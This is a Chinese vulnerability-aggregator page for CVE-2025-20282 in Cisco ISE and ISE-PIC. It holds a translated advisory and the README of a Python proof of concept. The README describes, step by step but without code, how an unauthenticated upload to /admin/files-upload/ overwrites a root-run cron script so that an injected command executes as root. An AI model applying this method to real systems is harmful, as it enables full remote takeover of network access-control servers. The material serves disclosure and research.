关联漏洞
标题:Cisco ISE和Cisco ISE-PIC 安全漏洞 (CVE-2025-20282)Description:Cisco ISE和Cisco ISE-PIC都是美国思科(Cisco)公司的产品。Cisco ISE是一个 NAC 解决方案。用于管理零信任架构中的端点、用户和设备对网络资源的访问。Cisco ISE-PIC是一个组件。 Cisco ISE和Cisco ISE-PIC存在安全漏洞,该漏洞源于文件验证不足,可能导致上传和执行任意文件。
Description
Proof of concept of CVE-2025-20282, the perfect 10.
介绍
Cisco ISE CVE 2025-20282
Proof of concept
Writeup: https://riversecurity.eu/like-stealing-cisco-ise-cream-from-a-kid-weaponizing-a-cve/
The python script abuses the upload function that is availible unauthenticated at /admin/files-upload/
The script locally creates a bin folder and a file named isehourlycron.sh and fills it with the (the file is base64 encoded and included in the script) original content from Cisco ISE installation (located in /opt/CSMS/bin) folder.
A command is then added at the end of the file. Unless you specify "--reset", in that case the command will not be added and the file will be reverted to the original content.
The script then zips that folder recursivly with its content to a file named output.zip.
The file is then uploaded to the ISE installation using the /admin/files-upload/.
On the Cisco ISE side, the output.zip will be placed in /tmp/ and all its content will be extracted to /opt/CSCOcpm/ folder.
The isehourlycron.sh runs as root several times within an hour. Allowing for remote code execution as ROOT.
文件快照
[4.0K] /data/pocs/2f6cbd043fdca9218e0213cd326a6d6f949e226e
├── [ 64K] CVE-2025-20282 - v2.py
└── [1.0K] README.md
1 directory, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。